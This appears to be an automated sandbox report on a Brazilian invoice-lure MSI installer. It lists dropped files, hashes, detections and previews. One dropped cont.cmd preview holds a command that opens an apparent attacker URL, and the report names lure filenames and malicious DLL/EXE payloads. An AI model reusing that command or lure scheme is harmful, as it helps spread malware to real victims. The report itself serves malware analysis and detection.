	HomeDesk.msi	Get hash	malicious	Unknown	Browse
	AFATS317052024.msi	Get hash	malicious	Unknown	Browse
	z62DEBT3042024.msi	Get hash	malicious	Unknown	Browse
	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse
	Pedido-Faturado-398731.msi	Get hash	malicious	Unknown	Browse
	Pedido-Faturado-39873.msi	Get hash	malicious	Unknown	Browse
	fatKCMAGKKH.msi	Get hash	malicious	Unknown	Browse
	danfe678478.msi	Get hash	malicious	Unknown	Browse
	Fat012024.msi	Get hash	malicious	Unknown	Browse
C:\Windows\Installer\MSI7BCB.tmp	hBqTrQLya4.msi	Get hash	malicious	Unknown	Browse
	CrzA2u67LQ.msi	Get hash	malicious	Unknown	Browse
	HomeDesk.msi	Get hash	malicious	Unknown	Browse
	z1Pedido-Faturado-NF-938731.cmd	Get hash	malicious	Unknown	Browse
	arquivo.msi	Get hash	malicious	Unknown	Browse
	25690.01808D.msi	Get hash	malicious	Unknown	Browse
	fatKCMAGKKH.msi	Get hash	malicious	Unknown	Browse
	SPMServer_2024.3.5.473.exe	Get hash	malicious	Unknown	Browse
	SPMServer_2024.2.1.7.exe	Get hash	malicious	Unknown	Browse
	SPMServer_2024.3.1.22.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Config.Msi\58791d.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	11335
Entropy (8bit):	5.291383059910354
Encrypted:	false
SSDEEP:	96:zYCAAFYWKY9TrWJtDPKrtRi612O4sGBFBww:zYCfFlKyrWbDGidP
MD5:	C3CDEB1067A1835C6556C76756D3C21B
SHA1:	999DEFA8869AB069EE59639EAE2576F213FC08D5
SHA-256:	4C6C1DE9885ACB1DAA2DCB044D90A7CF05D1B67D0EDA2FB54A570FF564BDED7F
SHA-512:	FFBEDC31EF96B88F33EAEB2F0E84498FA852F963FA8B1E74594F4B052513C83A32AEB94DA82D6D8DFF6F04C8594E1310D147C64E779E45798C933AF1FF8FEFE1
Malicious:	false
Preview:	...@IXOS.@.....@b?.Y.@.....@.....@.....@.....@.....@......&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}..Aplicativo Windows..documento_fiscal.msi.@.....@?....@.....@........&.{36B01411-86F7-4A5B-B71C-E30003C2B666}.....@.....@.....@.....@.......@.....@.....@.......@......Aplicativo Windows......Rollback..A.....o. .d.e. .r.e.s.t.a.u.r.a.....o.....RollbackCleanup..Removendo arquivos de backup..Arquivo: [1]....ProcessComponents%.Atualizando o registro de componentes..&.{60715A9F-4AEC-4D83-B87A-914CE6AF84AD}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{232B65CE-07F2-4C09-8446-D0B152043BFA}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{22B4B4EB-20D3-4CCD-A51F-EBD421917779}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{3A6531DD-7594-4904-AAB9-32F10FD461DF}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{4669957E-4874-4408-AF9D-19502B394F45}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{587DB8FA-5E47-49FB-BA4E-9C8B8D4106FB}&.{84A29AC3-6CE2-4D4C-A459-E583C2AFC8C9}.@......&.{FBE504

C:\Users\user\AppData\Local\Temp\MSI87812.LOG

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	351512
Entropy (8bit):	3.8262447886257545
Encrypted:	false
SSDEEP:	3072:SjnRFKFqqKCbAZcO3OY3uB2sAWkADpQRa3d6Tkfhb6+pYU5oflBWssPPCD9RTmiu:SjnjY
MD5:	CF933F40D6C81F4062BC57242BB624A2
SHA1:	8079613771E39A097F2BCB08538C09678DE9F69F
SHA-256:	0043DD695F714F7A29CFF103880394A56675220E497E111E3DC5A0B903818690
SHA-512:	81F5AF6C5308E931682639DD31DE1FDEB2C2775A489C58C936E55F84816AF47D8A306FD882D66F3543E5FDF6FA3E85E62A5A3210B67ABD3485F459D653E3DD16
Malicious:	false
Preview:	..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .0.4./.0.8./.2.0.2.4. . .0.7.:.5.9.:.0.0. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.8.:.5.C.). .[.0.7.:.5.9.:.0.1.:.0.3.4.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.5.8.:.5.C.). .[.0.7.:.5.9.:.0.1.:.0.3.4.].:. .F.o.n.t. .c.r.e.a.t.e.d... . .C.h.a.r.s.e.t.:. .R.e.q.=.0.,. .R.e.t.=.0.,. .F.o.n.t.:. .R.e.q.=.M.S. .S.h.e.l.l. .D.l.g.,. .R.e.t.=.M.S. .S.h.e.l.l. .D.l.g.......M.S.I. .(.c.). .(.5.8.:.6.C.). .[.0.7.:.5.9.:.0.1.:.0.6.5.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.8.:.6.C.). .[.0.7.:.5.9.:.0.1.:.0.6.5.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .

C:\Users\user\AppData\Roaming\Defendr\AGLoader.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11303936
Entropy (8bit):	7.946351148003788
Encrypted:	false
SSDEEP:	196608:OxEpUYfQwiD57aHiCNsnJijwvBI5WQX1VuXiiIlL77azp+1CZXxG:LleD1aHvaijws2f4n1C1xG
MD5:	0DBC4C560166F7F2BE1F4162E2A23E7B
SHA1:	F01C6F1D6F7B72D4683DDF535968FFEA2046EEA9
SHA-256:	3BA2BDB7567194E41752B5DBE7C9422C39A2666ED322B821567A2D84A21AF8D3
SHA-512:	2C061B69632021EF8D570B91AC96D8E2AEF77CD9E422B58786864C261D08254B80D21A90D8A3170CC5275F6CD857114F9B5B7BA7D8EC0F966B2D4234B172B5AE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 51%, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L....TNf...........!................h.............@..........................p............@......................... ........M..d............................`..h.....................................................o.$.....w......................text...@........................... ..`.itext..8........................... ..`.data....P..........................@....bss.....i...p...........................idata..(...........................@....didata.............................@....edata..............................@..@.rdata..E...........................@..@.L<L....p.`.. ...................... ..`.JIY....<.....o.....................@....yK!....`l....o..n.................. ..`.reloc..h....`.......t..............@..B....................................................................................@..@........................................................

C:\Users\user\AppData\Roaming\Defendr\LKdayanJELT9QDD900055.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	295944
Entropy (8bit):	6.59442664366273
Encrypted:	false
SSDEEP:	6144:slR5gD9yOvDIxyVQN8cnqDt+T1MLFUM8O:sRgD9iGQyFET1MLD8O
MD5:	EB67273C54E78DB4FAFFAB9001148753
SHA1:	0E6CAB2FDF666E53C994718477068E51B656E078
SHA-256:	7FA7499C7A72041D7D0FB1E4659466AD8D428080A176FA16276FD60ADC9DA0FD
SHA-512:	8FCAE871423C03850787CDC62F9E2555B054A8480772003FBFA5799AE7359C438D9F64C95592D265328909863FD000D6CDB4B34A6A8810045BC4029F23F6BD07
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 61%, Browse
Joe Sandbox View:	Filename: HomeDesk.msi, Detection: malicious, Browse Filename: HomeDesk.msi, Detection: malicious, Browse Filename: AFATS317052024.msi, Detection: malicious, Browse Filename: z62DEBT3042024.msi, Detection: malicious, Browse Filename: Pedido-Faturado-398731.msi, Detection: malicious, Browse Filename: Pedido-Faturado-398731.msi, Detection: malicious, Browse Filename: Pedido-Faturado-39873.msi, Detection: malicious, Browse Filename: fatKCMAGKKH.msi, Detection: malicious, Browse Filename: danfe678478.msi, Detection: malicious, Browse Filename: Fat012024.msi, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4)..UG.UG.UG....UG.....UG....uUG.e...UG.UF..UG....UG....UG....UG....UG.Rich.UG.........................PE..L.....GX.................L...<......%P.......`....@.................................q.....@.............................k.......d....................f..................................................@............`..x............................text....J.......L.................. ..`.rdata.......`.......P..............@..@.data....G...0..."..................@....rsrc................4..............@..@.reloc...........0...6..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Defendr\cont.cmd

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.161702408889296
Encrypted:	false
SSDEEP:	3:jhR0ALqKWXtivJ3eKWqt1QVn:jH5u3s3eNC1QV
MD5:	D40DF264C922D1B1A50D3571B4CAA927
SHA1:	648E867DD4FB14499C40EF5634095A1CCE4E3FB1
SHA-256:	B29792360D3281E44C12D97F18FE7DD4AB0964107753E16483A7E07BE1297E43
SHA-512:	5BCD59DB2605E109C5F65D658ECC9C33C2C28BFD01F2AE0956CEA1BE92D96E00F0AE5C6FDA4922A1B87FC6F8738250DE42950B5189528D39A7756E95E110C198
Malicious:	false
Preview:	Start http://senhordos-infects.digital/clientesnew/inspecionando.php

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	103983
Entropy (8bit):	7.998338521209024
Encrypted:	true
SSDEEP:	1536:BW6uIWYmeDQymkE1pdtZtudaj7guiIOWUWeIIYUda3GsG6+7Alf1:o2WYLDKv9tZkdwiIOdcIv2R/+7A91
MD5:	F3E2E17C9D9D0A2A617D5191C52B2A46
SHA1:	A8C71D1726E88CB212D5CAF85F22161889425CD5
SHA-256:	68D812F6F5332E25299A988317E00E232E77C976E1325DD482D199E14B4C0A94
SHA-512:	ACA15110ABC4C6EC68D77530EC7AD28C52C251B93D8BE8AF7DA5D3D837B446D28D783D47F726B9F1BD6412E950379FDDC5457BA6E642D65C20971F89425E68F1
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	72670
Entropy (8bit):	7.997561227399474
Encrypted:	true
SSDEEP:	1536:BW6dODTVkPr4Aqr6l32rDHIGJrM0lEbCze4lL7p:ofcks2rcu5Kbye4z
MD5:	A1273F0C3285077283ACECA12E6441CF
SHA1:	D0A3059C109592E207C2A959D7006E66D16079AD
SHA-256:	6018FC0C419711176481E092C6268198EC4AF0979FA020A41F7317589D720592
SHA-512:	245579D00432D1A96A463F262DA6706E48FF7B810454C7806832CA964125733D0330213AEE36503EB4224D60DD42419E14F5B2566E8BC50362ABA18FFE31CCA4
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv0.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	79550
Entropy (8bit):	7.997580721217276
Encrypted:	true
SSDEEP:	1536:TKj2za98A5BSKR2yhF074MeSHuhdefgHXQS+eayU:Gj2W2A07teWqQfagYU
MD5:	33D4E72700DE06616773F322FFEADE23
SHA1:	DFB9AF6B852B7C75861AB231524626539EFE98EC
SHA-256:	15FAF32B447CF64F47117812ADDCC5EE4A9E654F062508A14E745E4A4A8D82AF
SHA-512:	A07DD5836A03BD50FD1F3A35FBFE2693A1EF12B1AC49FAFD3FA5DB42FEA0CA4D96B3306C5F78DB6014E924364805D852A4CE61ED7B438759C8D76410AEF24EBE
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;...j@{..`..9.<(...../x...6.Z.......'.9...5....z.v.gJ..Yq.+.._..4.3.....X..(VPV..{......R"x...00. y7.P.R.[2..!...+...ZY...V.....M.f......\S..B...bz..s...f.4gc....H..O.G...9,.........A.l.....=m.:.'.Mt..c....9..5...'..U@^.gC.9.@M=...y..h..%..n)n.!.j.V..Wx.y@W...}}.T..>}.......f..2e%:X....#..0.k.."g.>,.`.....Gi.I.....b..?...h.N.+..6~Jz... A}..c......;Y..A...M..q)Y.A...."q..'.......?....o.o...;T.k.%R.j._..$....<9t...".7.....F5`.l.......@.@a#....ixDh.F.;........2.&f..c7........p..`.$.Pd+.w...;..)t.N...B...^n..K..:NL.ot.)".DZ...j'O.L\|..^....~N]@.O..-0..z...T.i.rr.M.v9j..s.......N..\|q).+....f.TV..j....z.....t......0.......w.y........f.S[E.[!..@..Q..w...c.j.~.Oa..0...Ci...jLT3:g.Oq^...+.........7......2..Bh./B..7.....k.F...L...S.....w.@$.....5.d...g\|.h:_g...t.8p..u.....>..+.]i..f..Z..d...,.(.h3.q.....2L.N.W....5$k[.....V.P@.M=...Q....h..'F.oDL>vpCWU.]JkJ...lc.KVC..).`L..mg............:.\|..4...D.:J.bZ.wO...64....ZIg...-O

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	90741
Entropy (8bit):	7.99772780022569
Encrypted:	true
SSDEEP:	1536:BW68pTu/DzylC/KrWuo2kqy/31NftiQZs/Ye4Y0oD65WxEw9HNDE7:oJpTQz6C/KKpz58Ks/f44G5WxEIJy
MD5:	31BE227EBD00EB32E0D97C03547953AA
SHA1:	29B9357D45D7B9417E8D701562DF4ECF029AA235
SHA-256:	2ABD44444B428A8438980C23290653818567A1C52A6F6E28CD582F02ED7A1997
SHA-512:	8962F0F3D09CE5FCEC54C4C311593A53BF8C5510E9558D1D2AA17539F55CD9362DD44FEBAFDE2FA9FA2DF92FFC7FBB4AACC54971829ECE6F0A368E237D59F5FD
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.2.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	23014
Entropy (8bit):	7.993330995993904
Encrypted:	true
SSDEEP:	384:BW6Npc2cLZYGT+bJP89WYiJJbfSvNUUi9++4qEiEyJ8B0ih/n2:BW6Npchus+bJP8wLf7U8F2iR40Y/n2
MD5:	3F07A14138725B4FEA87018778E99C9D
SHA1:	E9476B1F97D68E4B041CE45B3AC8B367FDA9AE73
SHA-256:	884AF08E980F32A5D857AEF65E94D692CC5179F0298151CB3EEE28307D5294C3
SHA-512:	5621FB39A236BB634E8E2C99237592532B914DC532D23922410615FA7D4D41B7A8452AB2BA318DEF99910FF72C9BF212BE463EB0C34D91DF85900F37136C059E
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv1.3.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	64412
Entropy (8bit):	7.997009584668567
Encrypted:	true
SSDEEP:	1536:BW6+yg8Lks0LNMax67S2fSMxkTo+Oh/GFjlC1f4CO8RkY7H2JUkgGiXPwbj4:op8gsg5xYS2q9TzOHOCO8RNH2JUPGiXx
MD5:	C5A27652BFEF12D580F8C7D9278BFB56
SHA1:	B8FA94A092969B00A2CA49AADE501F86C7D05124
SHA-256:	84239C96D1A3EEA8F4A1131EE859C70863D2D2FF981DB955A204D06FB3E399F9
SHA-512:	93485D1AAFFD03E2B9BDF8AC519B4A1B2F9504B7DECE5A72E93BD78D7C1EAF287D347D6B0088CB665395B2099C9DE8285444986DAF6955C984B4BD0447679C99
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv10.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	53999
Entropy (8bit):	7.996770426163462
Encrypted:	true
SSDEEP:	1536:BW6XYLT5F0YEIefnYXpZZ878ZUqvsLj+LCGHiGP:o1H5JEIefIp7U8V0Lj+LCA
MD5:	21A9EE4A323D30EBF01E909E0D2458DD
SHA1:	B1FF6EF537D741A21DE4C9940711E5403CB95154
SHA-256:	84FF014DDE709723B41574356866AE44A9C31FBE172719091AF2F7C211F515C5
SHA-512:	8376BE074DDCCD81B0B512F45D22C96D4DF2CB2BC28051977B489784E9A96BE195BC451BA34D010EC006817843525090B99323B2FA171396E0554F5752F15A47
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv10.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32176
Entropy (8bit):	7.995349694654279
Encrypted:	true
SSDEEP:	768:BW6N0QSaME0UDtQrJ06y1AdWkYnAC67Ho77gDtUcJydY7AxG8OGY1kbJ7:BW6PSaMc5Qr+Oul77gpUckoOOBCbB
MD5:	0F47D734176C343CF3FBE700D08D0062
SHA1:	5D33092BE18F4EA93B82B852B806436AB9AAE103
SHA-256:	61D82DE1D9F5DF0B5F96C7F4E1CB249E3A41A49A3225FA2C58E781E0AA8AC351
SHA-512:	CB602DAAD0CC177BAA032389842F9D47D4D3085363875FAD9947FC735E8DD883C558EB35F4C944B340A25A3F15768FF3084ACB3622224516DA3D046E0E6ADE68
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv11.0.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	103698
Entropy (8bit):	7.997954975179584
Encrypted:	true
SSDEEP:	3072:onCjBvz5FE815qPXpDm/1pJUEOYMKzxhqZRgSgfXU5:TjBvzrEY5qPXpD4TJLM6NU5
MD5:	D5607B6BF989EF431346619F0D81D09F
SHA1:	7C9606C08F7EE8176948A694BF36ED7BEF058571
SHA-256:	C8E14FDE2559E6F71CA0CF023D2CC51636E171B206CAEFC11DEF6045D98E66A1
SHA-512:	E92948490B261A222FD26237CC3A94E68EC561EE42B0ED2D54267EB0A17CB1A8B4BFB0DC2474E6945D6BB6E6A3062B55A875A445CCF265A225390C3537F6BDE1
Malicious:	false
Preview:	.#D...e..,...!G...A..I....;.9...UK.......b.z.m.iG.}..a....k..@:g...f...."...s.@].3$..h....J......Qc.F...3.>r..P...(2..5....ERA.....G.eK.?..]...M....]......h...b..8i.ZJ.4..H..[.....ji.I.6"........P...j.~.-.......E.[....'..Y.)Q=..D..wX....v.2.JW.....0..p.d..cZ.........7.-\|0.......C....3..#1...R.........d+>{...x!OT..du.Y.r.H....^...W.....s.)......t...U.kJ...;.7k...th."....~O...[.C.. 2[...j^.....y.........4..0;..0.7..C.?.......W.n'.X.[.on.....o'.._..(.'....n.........#.g.wh('.R.!........tcCq...Z...9.7...!-gP.c.m8i.>N.O.p.P..#I".zH....5.@.F..(............._..t.2.C...b]-. ..,$NR.\|%4..Q.m.....U#F.P....e..)=..4...,..M.X.\.1.a...'.>.,h..r..i...4.)....\|.....=.....z.{6.....8.p:LZq}n.%.M.y...\|2.m~.E..j9..e..8.....14.....1.z.$.....gs..."..>.j.....n........4.&\..Y....5MQ..].:t.`=D=%qh..xZ4_._sKz.N....o.0..g..r.z.y.G.......L..A.....J..a..!G...\|nC....),...M..a.....L......Y.....@\.Gu.~>...@ ...\|R.9..Z&V.4....LYo/.I...]..h..I;...1...l."y._<......hx...e.LP.Mbi..

C:\Users\user\AppData\Roaming\Defendr\iframe\rolloutfile.tv11.1.tv

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	36816
Entropy (8bit):	7.995057511765618
Encrypted:	true
SSDEEP:	768:BW6NKcj+tNNn72mIuTvBvWG4q8hQP7eW5QJsdU9Q9qRpK8vP1O9:BW6yfB7nFvaQTeaBUQqDK8u
MD5:	8912777F68DD57322A21A454A3038289
SHA1:	F7373B9BF2C1BE2542144873D904D3205514F13E
SHA-256:	26F01B5F8468B8E78D88232717D2785C9EAEC35F239820AFB0DDA382297A0830
